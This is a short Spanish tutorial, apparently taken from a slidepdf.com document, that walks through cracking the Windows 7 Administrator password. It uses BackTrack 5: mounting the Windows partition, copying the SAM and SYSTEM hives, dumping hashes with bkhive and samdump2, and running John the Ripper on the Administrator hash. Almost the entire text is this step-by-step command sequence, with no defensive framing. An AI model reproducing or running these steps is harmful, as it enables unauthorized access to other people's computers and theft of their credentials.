5/13/2018 2-Romper Password Windows 7 - slidepdf.com

http://slidepdf.com/reader/full/2-romper-password-windows-7 1/3

 

Para este ejemplo vamos a utilizar la distribución de Linux Back-Track-5 en modo texto como

root todo el rato para romper la password de Administrador de Windows 7.

Para acceder al entorno gráfico se puede ejecutar el comando startx y la password de root es

toor

Lo primero interesa saber que tipo de particionado tiene el equipo.

fdisk -l

Si hay dudas se pueden montar todas las particiones necesarias y averiguar por el contenido

en cual está el sistema operativo Windows7. Supongamos que está en la segunda partición.

Antes habría que haber creado un directorio donde se habría montado la partición.

mkdir /mnt/sda2

mount -t ntfs /dev/sda2 /mnt/sda2

Acceder al directorio de configuración

cd /mnt/sda2/Windows/System32/config/

Copiar los ficheros SYSTEM y SAM en el directorio home de root.

cp SYSTEM /root/.

cp SAM /root/.

Cambiar al directorio en el que se han copiado los ficheros

cd

Ejecutar los comandos bkhive y samdump2

bkhive SYSTEM /root/key

samdump2 SAM /root/key > /root/list

Dejar en un fichero la password del administrador encriptada

cat /root/list | grep Admin > /root/pwAdmin

Acceder al directorio del ejecutable de john

cd /pentest/passwords/john/

Ejecutar john para adivinar la password del administrador

./john --format=NT /root/pwAdmin

5/13/2018 2-Romper Password Windows 7 - slidepdf.com

http://slidepdf.com/reader/full/2-romper-password-windows-7 2/3

 

 

5/13/2018 2-Romper Password Windows 7 - slidepdf.com

http://slidepdf.com/reader/full/2-romper-password-windows-7 3/3